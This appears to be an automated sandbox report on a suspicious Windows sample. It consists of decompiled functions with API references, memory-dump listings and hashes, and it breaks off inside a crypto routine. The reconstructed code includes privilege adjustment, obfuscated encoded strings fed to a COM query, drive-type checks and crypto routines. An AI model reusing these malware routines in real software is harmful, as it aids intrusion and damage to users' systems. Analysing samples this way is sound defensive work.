                  • Instruction Fuzzy Hash: 52014470A40708BBEB209FA4DC5DFDDFBB89B00715F144194B519E62D1E7B54A84C771
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0B664 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E00D0B664(long __eax) {
				char _v5;
				long _t2;

				_t2 = __eax;
				while(1) {
					asm("lodsd");
					if(_t2 == 0) {
						break;
					}
					_t2 = RtlAdjustPrivilege(_t2, 1, 0,  &_v5); // executed
				}
				return _t2;
			}





                  0x00d0b664
                  0x00d0b671
                  0x00d0b671
                  0x00d0b674
                  0x00000000
                  0x00000000
                  0x00d0b683
                  0x00d0b683
                  0x00000000

                  APIs
                  • RtlAdjustPrivilege.NTDLL(00000000,00000001,00000000,?), ref: 00D0B683
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AdjustPrivilege
                  • String ID:
                  • API String ID: 3260937286-0
                  • Opcode ID: 2ec0caf39b887e4f4a8c59ab88621cf0b6c5e8532d929a66a6c1615bcf0f73c0
                  • Instruction ID: 6a2cd503aa2f9e2331847eb9b6e61a67c63f13e4ba6cf6ff15be9be3d8027a47
                  • Opcode Fuzzy Hash: 2ec0caf39b887e4f4a8c59ab88621cf0b6c5e8532d929a66a6c1615bcf0f73c0
                  • Instruction Fuzzy Hash: 43D02E3224CB09A6DA2017646C41BF2339CC301331F400357AE0BEF2C0EB63AA4202F5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D06868 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00D06868(void* _a4, long _a8) {
				void* _t6;

				_t6 = RtlReAllocateHeap( *(E00D010AC() + 0x18), 8, _a4, _a8); // executed
				return _t6;
			}




                  0x00d0687c
                  0x00d06883

                  APIs
                  • RtlReAllocateHeap.NTDLL(?,00000008,?,00000400,?,00D097F5,?,00000400), ref: 00D0687C
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: b90cbe62c9619f781f292cd2ea016ea57d7b4bb8f2bfae123719fc4100ff70ab
                  • Instruction ID: 864abd6dd3896395987ccce329dac2b93b47975d8119df650379e2ff0b5429c2
                  • Opcode Fuzzy Hash: b90cbe62c9619f781f292cd2ea016ea57d7b4bb8f2bfae123719fc4100ff70ab
                  • Instruction Fuzzy Hash: A0C01236040608ABCA406F909C05E897718AB64301F40C000B6484A161C631D5559760
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0684C Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00D0684C(void* _a4) {
				char _t5;

				_t5 = RtlFreeHeap( *(E00D010AC() + 0x18), 0, _a4); // executed
				return _t5;
			}




                  0x00d0685d
                  0x00d06864

                  APIs
                  • RtlFreeHeap.NTDLL(?,00000000,00000000,?,00D17745,00000000), ref: 00D0685D
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: b010de9b7b311b7d6fd286a7eb6e23fb8b7607c24aaa0c67ab7b72ab812f02e8
                  • Instruction ID: 7d1962e000b3c8ab92e4beea6aa84a8bc824861e9a81f9482258537fe5741be4
                  • Opcode Fuzzy Hash: b010de9b7b311b7d6fd286a7eb6e23fb8b7607c24aaa0c67ab7b72ab812f02e8
                  • Instruction Fuzzy Hash: C4C04C76540608ABD6106BD4AC05F95775CAB68701F814011B7088A165C675E49197B8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D06830 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00D06830(long _a4) {
				void* _t5;

				_t5 = RtlAllocateHeap( *(E00D010AC() + 0x18), 8, _a4); // executed
				return _t5;
			}




                  0x00d06841
                  0x00d06848

                  APIs
                  • RtlAllocateHeap.NTDLL(?,00000008,00000000,?,00D176B5,?,00000000,00000000), ref: 00D06841
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 53b8a67f08d58a771579b7fb3d37b32c79d15481a45585a245d17380fe38fdfa
                  • Instruction ID: cf702f4f008d6f17eddd7027e5c6ae841d5b5fd6bc6b245e0ea166963dda4df3
                  • Opcode Fuzzy Hash: 53b8a67f08d58a771579b7fb3d37b32c79d15481a45585a245d17380fe38fdfa
                  • Instruction Fuzzy Hash: 85C08C36080608ABC6006B90A805EC5771CAB64312F408010B3088B161CA31E49287B4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0A180 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00D0A180(WCHAR* _a4) {
				int _t2;

				_t2 = GetDriveTypeW(_a4); // executed
				return _t2;
			}




                  0x00d0a186
                  0x00d0a18d

                  APIs
                  • GetDriveTypeW.KERNELBASE(?), ref: 00D0A186
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: DriveType
                  • String ID:
                  • API String ID: 338552980-0
                  • Opcode ID: 147164b543363827fe230943a296d76878d977fc4dd9e18eecd1a845957c0127
                  • Instruction ID: 128c5bfe172e8f911371611443e4a9dd664bc1fa75f861b2dd553243f52da6d3
                  • Opcode Fuzzy Hash: 147164b543363827fe230943a296d76878d977fc4dd9e18eecd1a845957c0127
                  • Instruction Fuzzy Hash: 95B0123100020CA786005F41FC04C857F5DD7202717004021F5044012087325462DAA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D077FA Relevance: 1.4, APIs: 1, Instructions: 159COMMON
                  Download Yara Rule
                  C-Code - Quality: 37%
                  			E00D077FA() {
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				char _v48;
				intOrPtr _v56;
				char _v64;
				char _v80;
				char _v96;
				char _v112;
				char _v128;
				char _v152;
				char _v160;
				char _v168;
				char _v220;
				char _v284;
				char _v332;
				char _v460;
				void* _t142;
				intOrPtr* _t143;
				intOrPtr* _t145;
				intOrPtr* _t147;
				intOrPtr* _t149;
				intOrPtr* _t151;
				intOrPtr* _t153;
				intOrPtr* _t155;
				intOrPtr* _t157;
				intOrPtr* _t159;
				intOrPtr* _t161;
				void* _t166;
				void* _t170;
				void* _t176;
				void* _t230;
				void* _t233;
				void* _t234;

				_t234 = _t233 - 0x1c8;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_v24 = 0;
				_t142 =  *0xd25744(0, _t230); // executed
				if(_t142 == 0) {
					_t143 =  &_v80;
					 *_t143 = 0x7c7915f4;
					 *((intOrPtr*)(_t143 + 4)) = 0xa62dd110;
					 *((intOrPtr*)(_t143 + 8)) = 0x77fcdb95;
					 *((intOrPtr*)(_t143 + 0xc)) = 0x48019877;
					E00D01250(_t143, _t143, 4);
					_t145 =  &_v96;
					 *_t145 = 0x6beee6bf;
					 *((intOrPtr*)(_t145 + 4)) = 0xa6333347;
					 *((intOrPtr*)(_t145 + 8)) = 0x1dfc0db0;
					 *((intOrPtr*)(_t145 + 0xc)) = 0x93d20b38;
					E00D01250(_t145, _t145, 4);
					_t147 =  &_v112;
					 *_t147 = 0xd0b726a0;
					 *((intOrPtr*)(_t147 + 4)) = 0xa62caeaa;
					 *((intOrPtr*)(_t147 + 8)) = 0x77fc3195;
					 *((intOrPtr*)(_t147 + 0xc)) = 0x48019877;
					E00D01250(_t147, _t147, 4);
					_t149 =  &_v128;
					 *_t149 = 0xf350e64c;
					 *((intOrPtr*)(_t149 + 4)) = 0xa62ca8c4;
					 *((intOrPtr*)(_t149 + 8)) = 0x77fc3c98;
					 *((intOrPtr*)(_t149 + 0xc)) = 0x9774f677;
					E00D01250(_t149, _t149, 4);
					_t151 =  &_v332;
					 *_t151 = 0xb7a34067;
					 *((intOrPtr*)(_t151 + 4)) = 0xb78e4068;
					 *((intOrPtr*)(_t151 + 8)) = 0xb78a4057;
					 *((intOrPtr*)(_t151 + 0xc)) = 0xb7984051;
					 *((intOrPtr*)(_t151 + 0x10)) = 0xb78e405d;
					 *((intOrPtr*)(_t151 + 0x14)) = 0xb78e4079;
					 *((intOrPtr*)(_t151 + 0x18)) = 0xb794405b;
					 *((intOrPtr*)(_t151 + 0x1c)) = 0xb7884051;
					 *((intOrPtr*)(_t151 + 0x20)) = 0xb79f405d;
					 *((intOrPtr*)(_t151 + 0x24)) = 0xb789404c;
					 *((intOrPtr*)(_t151 + 0x28)) = 0xb799404a;
					 *((intOrPtr*)(_t151 + 0x2c)) = 0xb7fc4038;
					E00D01250(_t151, _t151, 0xc);
					_t153 =  &_v152;
					 *_t153 = 0xb7b3406a;
					 *((intOrPtr*)(_t153 + 4)) = 0xb7a84077;
					 *((intOrPtr*)(_t153 + 8)) = 0xb7bf4064;
					 *((intOrPtr*)(_t153 + 0xc)) = 0xb7b14071;
					 *((intOrPtr*)(_t153 + 0x10)) = 0xb7ce406e;
					 *((intOrPtr*)(_t153 + 0x14)) = 0xb7fc4038;
					E00D01250(_t153, _t153, 6);
					_t155 =  &_v168;
					 *_t155 = 0xb7b84071;
					 *((intOrPtr*)(_t155 + 4)) = 0xb7fc4038;
					E00D01250(_t155, _t155, 2);
					_t157 =  &_v284;
					 *_t157 = 0xb7b9406b;
					 *((intOrPtr*)(_t157 + 4)) = 0xb7b94074;
					 *((intOrPtr*)(_t157 + 8)) = 0xb7a8407b;
					 *((intOrPtr*)(_t157 + 0xc)) = 0xb7d64018;
					 *((intOrPtr*)(_t157 + 0x10)) = 0xb7ba4018;
					 *((intOrPtr*)(_t157 + 0x14)) = 0xb7b3406a;
					 *((intOrPtr*)(_t157 + 0x18)) = 0xb7dc4075;
					 *((intOrPtr*)(_t157 + 0x1c)) = 0xb795406f;
					 *((intOrPtr*)(_t157 + 0x20)) = 0xb7cf4056;
					 *((intOrPtr*)(_t157 + 0x24)) = 0xb7a3400a;
					 *((intOrPtr*)(_t157 + 0x28)) = 0xb794406b;
					 *((intOrPtr*)(_t157 + 0x2c)) = 0xb7984059;
					 *((intOrPtr*)(_t157 + 0x30)) = 0xb78b4057;
					 *((intOrPtr*)(_t157 + 0x34)) = 0xb793407b;
					 *((intOrPtr*)(_t157 + 0x38)) = 0xb7854048;
					 *((intOrPtr*)(_t157 + 0x3c)) = 0xb7fc4038;
					E00D01250(_t157, _t157, 0x10);
					_t159 =  &_v160;
					 *_t159 = 0xb7ad406f;
					 *((intOrPtr*)(_t159 + 4)) = 0xb7fc4074;
					E00D01250(_t159, _t159, 2);
					_t161 =  &_v220;
					 *_t161 = 0xb795406f;
					 *((intOrPtr*)(_t161 + 4)) = 0xb7cf4056;
					 *((intOrPtr*)(_t161 + 8)) = 0xb7a3400a;
					 *((intOrPtr*)(_t161 + 0xc)) = 0xb794406b;
					 *((intOrPtr*)(_t161 + 0x10)) = 0xb7984059;
					 *((intOrPtr*)(_t161 + 0x14)) = 0xb78b4057;
					 *((intOrPtr*)(_t161 + 0x18)) = 0xb793407b;
					 *((intOrPtr*)(_t161 + 0x1c)) = 0xb7854048;
					 *((intOrPtr*)(_t161 + 0x20)) = 0xb7b54016;
					 *((intOrPtr*)(_t161 + 0x24)) = 0xb7c1407c;
					 *((intOrPtr*)(_t161 + 0x28)) = 0xb7d9401f;
					 *((intOrPtr*)(_t161 + 0x2c)) = 0xb7db404b;
					 *((intOrPtr*)(_t161 + 0x30)) = 0xb7fc4038;
					E00D01250(_t161, _t161, 0xd);
					_t166 =  *0xd25758( &_v80, 0, 1,  &_v96,  &_v12); // executed
					if(_t166 == 0) {
						_t170 =  *0xd25758( &_v112, 0, 1,  &_v128,  &_v16); // executed
						if(_t170 == 0) {
							E00D06E1C(0xffffffff,  &_v8);
							if(_v8 == 0) {
								L10:
								_push( &_v20);
								_push(_v16);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push( &_v152);
								_push(_v12);
								if( *((intOrPtr*)( *_v12 + 0xc))() == 0) {
									_t176 =  *0xd25760(_v20, 0xa, 0, 0, 3, 3, 0, 0); // executed
									if(_t176 == 0) {
										_push( &_v24);
										_push(0);
										_push(0x30);
										_push( &_v284);
										_push( &_v160);
										_push(_v20);
										if( *((intOrPtr*)( *_v20 + 0x50))() == 0) {
											while(1) {
												_v28 = 0;
												_v32 = 0;
												_push( &_v32);
												_push( &_v28);
												_push(1);
												_push(0xffffffff);
												_push(_v24);
												if( *((intOrPtr*)( *_v24 + 0x10))() != 0) {
													break;
												}
												 *0xd257a0( &_v48);
												_push(0);
												_push(0);
												_push( &_v48);
												_push(0);
												_push( &_v168);
												_push(_v28);
												if( *((intOrPtr*)( *_v28 + 0x10))() == 0) {
													 *0xd25464( &_v460,  &_v220, _v40);
													_t234 = _t234 + 0xc;
													 *((intOrPtr*)( *_v20 + 0x40))(_v20,  &_v460, 0, 0, 0);
													 *0xd257a4( &_v48);
												}
												 *((intOrPtr*)( *_v28 + 8))(_v28);
											}
										} else {
										}
									} else {
									}
								} else {
								}
							} else {
								 *0xd257a0( &_v64);
								_v64 = 3;
								_v56 = 0x40;
								_push( &_v64);
								_push(0);
								_push( &_v332);
								_push(_v16);
								if( *((intOrPtr*)( *_v16 + 0x20))() == 0) {
									 *0xd257a4( &_v64);
									goto L10;
								} else {
								}
							}
						} else {
						}
					} else {
					}
					if(_v24 != 0) {
						 *((intOrPtr*)( *_v24 + 8))(_v24);
					}
					if(_v20 != 0) {
						 *((intOrPtr*)( *_v20 + 8))(_v20);
					}
					if(_v16 != 0) {
						 *((intOrPtr*)( *_v16 + 8))(_v16);
					}
					if(_v12 != 0) {
						 *((intOrPtr*)( *_v12 + 8))(_v12);
					}
					_t142 =  *0xd2574c(); // executed
				}
				return _t142;
			}










































                  0x00d077ff
                  0x00d07805
                  0x00d0780c
                  0x00d07813
                  0x00d0781a
                  0x00d07823
                  0x00d0782b
                  0x00d07831
                  0x00d07834
                  0x00d0783a
                  0x00d07841
                  0x00d07848
                  0x00d07852
                  0x00d07857
                  0x00d0785a
                  0x00d07860
                  0x00d07867
                  0x00d0786e
                  0x00d07878
                  0x00d0787d
                  0x00d07880
                  0x00d07886
                  0x00d0788d
                  0x00d07894
                  0x00d0789e
                  0x00d078a3
                  0x00d078a6
                  0x00d078ac
                  0x00d078b3
                  0x00d078ba
                  0x00d078c4
                  0x00d078c9
                  0x00d078cf
                  0x00d078d5
                  0x00d078dc
                  0x00d078e3
                  0x00d078ea
                  0x00d078f1
                  0x00d078f8
                  0x00d078ff
                  0x00d07906
                  0x00d0790d
                  0x00d07914
                  0x00d0791b
                  0x00d07925
                  0x00d0792a
                  0x00d07930
                  0x00d07936
                  0x00d0793d
                  0x00d07944
                  0x00d0794b
                  0x00d07952
                  0x00d0795c
                  0x00d07961
                  0x00d07967
                  0x00d0796d
                  0x00d07977
                  0x00d0797c
                  0x00d07982
                  0x00d07988
                  0x00d0798f
                  0x00d07996
                  0x00d0799d
                  0x00d079a4
                  0x00d079ab
                  0x00d079b2
                  0x00d079b9
                  0x00d079c0
                  0x00d079c7
                  0x00d079ce
                  0x00d079d5
                  0x00d079dc
                  0x00d079e3
                  0x00d079ea
                  0x00d079f4
                  0x00d079f9
                  0x00d079ff
                  0x00d07a05
                  0x00d07a0f
                  0x00d07a14
                  0x00d07a1a
                  0x00d07a20
                  0x00d07a27
                  0x00d07a2e
                  0x00d07a35
                  0x00d07a3c
                  0x00d07a43
                  0x00d07a4a
                  0x00d07a51
                  0x00d07a58
                  0x00d07a5f
                  0x00d07a66
                  0x00d07a6d
                  0x00d07a77
                  0x00d07a8c
                  0x00d07a94
                  0x00d07aab
                  0x00d07ab3
                  0x00d07ac0
                  0x00d07ac9
                  0x00d07b0e
                  0x00d07b16
                  0x00d07b17
                  0x00d07b1a
                  0x00d07b1c
                  0x00d07b1e
                  0x00d07b20
                  0x00d07b22
                  0x00d07b2a
                  0x00d07b2b
                  0x00d07b33
                  0x00d07b4b
                  0x00d07b53
                  0x00d07b62
                  0x00d07b63
                  0x00d07b65
                  0x00d07b6d
                  0x00d07b74
                  0x00d07b75
                  0x00d07b7d
                  0x00d07b84
                  0x00d07b84
                  0x00d07b8b
                  0x00d07b9a
                  0x00d07b9e
                  0x00d07b9f
                  0x00d07ba1
                  0x00d07ba3
                  0x00d07bab
                  0x00000000
                  0x00000000
                  0x00d07bb3
                  0x00d07bbe
                  0x00d07bc0
                  0x00d07bc5
                  0x00d07bc6
                  0x00d07bce
                  0x00d07bcf
                  0x00d07bd7
                  0x00d07bea
                  0x00d07bf0
                  0x00d07c08
                  0x00d07c0f
                  0x00d07c0f
                  0x00d07c1d
                  0x00d07c1d
                  0x00000000
                  0x00d07b7f
                  0x00000000
                  0x00d07b55
                  0x00000000
                  0x00d07b35
                  0x00d07acb
                  0x00d07acf
                  0x00d07ad5
                  0x00d07adc
                  0x00d07aeb
                  0x00d07aec
                  0x00d07af4
                  0x00d07af5
                  0x00d07afd
                  0x00d07b08
                  0x00000000
                  0x00000000
                  0x00d07aff
                  0x00d07afd
                  0x00000000
                  0x00d07ab5
                  0x00000000
                  0x00d07a96
                  0x00d07c29
                  0x00d07c33
                  0x00d07c33
                  0x00d07c3a
                  0x00d07c44
                  0x00d07c44
                  0x00d07c4b
                  0x00d07c55
                  0x00d07c55
                  0x00d07c5c
                  0x00d07c66
                  0x00d07c66
                  0x00d07c69
                  0x00d07c69
                  0x00d07c72

                  APIs
                  • CoInitialize.OLE32(00000000), ref: 00D07823
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Initialize
                  • String ID:
                  • API String ID: 2538663250-0
                  • Opcode ID: fa946140e32ce7b25c6f34b6367ff2d23eaeaaedd80456d6ffd3d946c3d55dc8
                  • Instruction ID: a0fea2a800e8228a8d6fff9e3b0b97905f7d5da8a656fca050b7935365e5000b
                  • Opcode Fuzzy Hash: fa946140e32ce7b25c6f34b6367ff2d23eaeaaedd80456d6ffd3d946c3d55dc8
                  • Instruction Fuzzy Hash: BC8104B0840304EFD750EF50E989A5ABF78EF62354F168998E4286F262C376DA45CF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0DDA4 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00D0DDA4(intOrPtr _a4) {
				void* _t4;
				void* _t5;

				_t5 = 0;
				if(E00D01574() > 0x3c) {
					_t4 = E00D0DC40(_a4); // executed
					_t5 = _t4;
				}
				if(_t5 != 0) {
					Sleep(0xc8); // executed
				}
				return _t5;
			}





                  0x00d0dda8
                  0x00d0ddb2
                  0x00d0ddb7
                  0x00d0ddbc
                  0x00d0ddbc
                  0x00d0ddc0
                  0x00d0ddc7
                  0x00d0ddc7
                  0x00d0ddd1

                  APIs
                  • Sleep.KERNELBASE(000000C8,?,?,00D0E361,00000000,?,00000000,?,?,?), ref: 00D0DDC7
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: bb77a80a098e3c0b95c0e382c6545b5b22e598134f24da7af86fbcb992364bf6
                  • Instruction ID: bb8574e096530c59082c1f7662a3658b2f13a89f16b3e6c06413f55c1730f2ab
                  • Opcode Fuzzy Hash: bb77a80a098e3c0b95c0e382c6545b5b22e598134f24da7af86fbcb992364bf6
                  • Instruction Fuzzy Hash: A3D0A9322493092BE7203EE8ACC2E4EF60BAB64320F008233FA0886282C9B1C8144274
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 00D04D18 Relevance: .3, Instructions: 328COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 37%
                  			E00D04D18(intOrPtr* _a4, void* _a8) {
				signed char _t340;
				void* _t427;
				intOrPtr* _t429;

				_t429 = _a4;
				_t340 =  *(_t429 + 8);
				asm("bswap eax");
				asm("bswap ebx");
				asm("bswap ecx");
				asm("bswap edx");
				 *0xd251f4 =  *_t429;
				 *0x00D251F8 =  *((intOrPtr*)(_t429 + 4));
				_t427 = 0xd251f3;
				 *(_t340 + 0x4d8b0c57) =  *(_t340 + 0x4d8b0c57) | _t340;
				asm("stc");
				asm("sbb [edx+0x25], dh");
			}






                  0x00d04d1e
                  0x00d04d2b
                  0x00d04d31
                  0x00d04d33
                  0x00d04d35
                  0x00d04d37
                  0x00d04d39
                  0x00d04d3b
                  0x00d04d3f
                  0x00d04d40
                  0x00d04d48
                  0x00d04d49

                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bab2e001da75532f29725a795ae5db9f4606752135a0bd3a840c6be55ea19b08
                  • Instruction ID: 0b8045654921dac0279ac7dd568e0417d843175b91224895b2f5720715f5e20b
                  • Opcode Fuzzy Hash: bab2e001da75532f29725a795ae5db9f4606752135a0bd3a840c6be55ea19b08
                  • Instruction Fuzzy Hash: E7E113BAA20E438BD714CF19E880725B3A2FB99700F1A8538C759C7B56C734F961CA90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D020BC Relevance: .3, Instructions: 307COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 66%
                  			E00D020BC(intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				void* _t177;
				signed int _t188;
				signed int _t220;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t235;
				signed int _t241;
				signed char _t242;
				signed int _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t254;
				void* _t256;
				void* _t258;
				signed int _t259;
				signed int _t263;
				signed int _t264;
				intOrPtr _t265;
				void* _t266;
				intOrPtr _t268;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t275;
				signed int _t277;
				signed int _t279;
				signed int _t281;
				void* _t284;
				intOrPtr _t287;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t294;
				signed int _t296;
				signed int _t298;
				signed int _t299;
				signed int _t300;
